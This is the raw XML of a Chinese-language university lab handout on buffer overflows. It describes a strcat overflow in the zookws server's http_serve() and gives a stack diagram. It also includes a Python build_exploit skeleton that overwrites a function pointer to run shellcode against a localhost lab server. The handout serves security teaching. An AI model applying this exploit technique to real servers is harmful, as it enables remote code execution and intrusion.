          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>服务器端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zookd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>处理请求并转发给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zookfs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>。处理请求的代码在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http.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>中，其中存在缓冲区溢出漏洞。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zookd.c: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70</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: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if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ((errmsg = http_request_line(fd, reqpath, env, &amp;env_len)))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zookfs.c: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47</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:    http_serve(sockfd, getenv(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REQUEST_URI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));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http_serve()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>函数中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strcat()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>触发缓冲区溢出漏洞导致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handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>变量被改写，在执行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(*handler)()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>函数时导致程序崩溃。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http_serve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fd,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const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*name)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>{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 xml:space="preserve"> (*handler)(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const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*) = http_serve_none;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pn[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1024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struct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> stat st;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getcwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(pn,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sizeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(pn));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setenv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DOCUMENT_ROOT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, pn,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);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strcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(pn, name);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split_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(pn);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/* ...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代码有删节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... */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handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(fd, pn);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http_serve()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>的栈结构：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  name          |&lt;——— (+12)   =0xbfffde14    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fd = 3          |&lt;——— (+8)    =0xbfffde10                               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 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return address     |&lt;——— (+4)    =0xbfffde0c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ebp           |&lt;——— (0)     =0xbfffde08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void (*handler)     |&lt;——— (-12)   =0xbfffddfc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|pn[1023]   ^            |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    |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pn[0]|&lt;——— (-1036) =0xbfffd9fc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struct stat st      |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(88bytes)        |&lt;——— (-1124) =0xbfffd9a4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攻击手段是构造一个请求令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pn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>缓冲区溢出，从而改写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handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>指针，令其指向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。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bottom of the stack                            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+————————————————————+———————————+——————————————————————+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void (*handler)   |  ^        | address of shellcode |———+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+————————————————————+  |        +——————————————————————+   |      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|pn[1023]   ^        |  |        |    'AAA'...'AAA'     |   |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|  |        +——————————————————————+   |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|  | name[0]|      shellcode       |&lt;——+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+———————————+——————————————————————+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pn[0]|   getwd   |  "/home/httpd/lab/"  |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+————————————————————+———————————+——————————————————————+&lt;——0xbfffd9fc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5C35" w:rsidRDefault="006D5C35" w:rsidP="006D5C3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D5C35" w:rsidRDefault="006D5C35" w:rsidP="006D5C35">
      <w:pPr>
        <w:pStyle w:val="a4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以此构造请求需要计算两个值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5C35" w:rsidRDefault="006D5C35" w:rsidP="006D5C35">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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填充</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>'A'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>的个数：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1024-len("/home/httpd/lab/")-len(shellcode)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5C35" w:rsidRDefault="006D5C35" w:rsidP="006D5C35">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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在栈中地址：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0xbfffd9fc + len("/home/httpd/lab/")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stack_buffer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bfffd9fc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def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build_exploit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24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):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Things that you might find useful in constructing your exploit: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urllib.quote(s)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  returns string s with "special" characters percent-encoded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struct.pack("&lt;I", x)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  returns the 4-byte binary encoding of the 32-bit integer x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variables for program addresses (ebp, buffer, retaddr=ebp+4)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req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GET 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urllib.quote(shellcode)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*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1024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len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/home/httpd/lab/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len</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(shellcode))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struct.pack(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&lt;I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, stack_buffer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len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/home/httpd/lab/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))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HTTP/1.0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return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> req</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5C35" w:rsidRDefault="006D5C35" w:rsidP="006D5C35">
      <w:pPr>
        <w:pStyle w:val="a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运行脚本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./exploit-3.py localhost 8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>，并在启动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服务的中断查看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是否被启动。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5C35" w:rsidRDefault="006D5C35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00461516" w:rsidRDefault="00461516" w:rsidP="00461516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、实验报告要求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00461516" w:rsidRDefault="00461516" w:rsidP="004615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、根据实验阐述本实验中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源码中的漏洞、其原理以及如何利用漏洞完成攻击的过程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00461516" w:rsidRPr="00461516" w:rsidRDefault="00461516" w:rsidP="00461516">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00B668DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要有</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必要的过程说明和实验截图</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00461516" w:rsidRPr="0046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9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1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9">
    <w:abstractNumId w:val="7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12"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="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C0"/>
    <w:rsid w:val="00142E4D"/>
    <w:rsid w:val="00251E57"/>
    <w:rsid w:val="00354F52"/>
    <w:rsid w:val="00390C75"/>
    <w:rsid w:val="003E0C4C"/>
    <w:rsid w:val="00461516"/>
    <w:rsid w:val="004C11D2"/>
    <w:rsid w:val="00580CC1"/>
    <w:rsid w:val="005C096A"/>
    <w:rsid w:val="006665F8"/>
    <w:rsid w:val="00683357"/>
    <w:rsid w:val="006906FB"/>
    <w:rsid w:val="006D5C35"/>
    <w:rsid w:val="007B4B58"/>
    <w:rsid w:val="008357D0"/>
    <w:rsid w:val="00872D3E"/>
    <w:rsid w:val="00976DE2"/>
    <w:rsid w:val="009B7D44"/>
    <w:rsid w:val="00AA342A"/>
    <w:rsid w:val="00B668DD"/>
    <w:rsid w:val="00C64F50"/>
    <w:rsid w:val="00D83F3A"/>
    <w:rsid w:val="00DD0F23"/>
    <w:rsid w:val="00E0477B"/>
    <w:rsid w:val="00E62DC0"/>
    <w:rsid w:val="00FA1390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eastAsia="宋体" w:hAnsi="Courier New" w:cs="Times New Roman" w:hint="eastAsia"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="纯文本 Char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Char">
    <w:name w:val="标题 2 Char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5">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="008357D0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a6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Char">
    <w:name w:val="标题 3 Char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7">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:rsid w:val="00461516"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="批注框文本 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:rsid w:val="004615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eastAsia="宋体" w:hAnsi="Courier New" w:cs="Times New Roman" w:hint="eastAsia"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="纯文本 Char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Char">
    <w:name w:val="标题 2 Char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5">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="008357D0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a6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Char">
    <w:name w:val="标题 3 Char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7">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:rsid w:val="00461516"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="批注框文本 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:rsid w:val="004615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Zhang/Security-Courseware/blob/master/buffer-overflow/supplyments/gcc-x86-Assembly.pdf" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/YuZhang/Security-Courseware/blob/master/buffer-overflow/supplyments/Smashing-The-Stack-For-Fun-And-Profit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uZhang/Security-Courseware/blob/master/buffer-overflow/supplyments/PC-Assembly-Language.pdf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uZhang/Security-Courseware/blob/master/buffer-overflow/supplyments/memorylayout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YuZhang/Security-Courseware/blob/master/buffer-overflow/supplyments/gdb-refcard.pdf" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://phrack.org/issues/49/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5574</Words>
  <Characters>31773</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>264</Lines>
  <Paragraphs>74</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>37273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pact</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-09T03:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-09T04:43:00Z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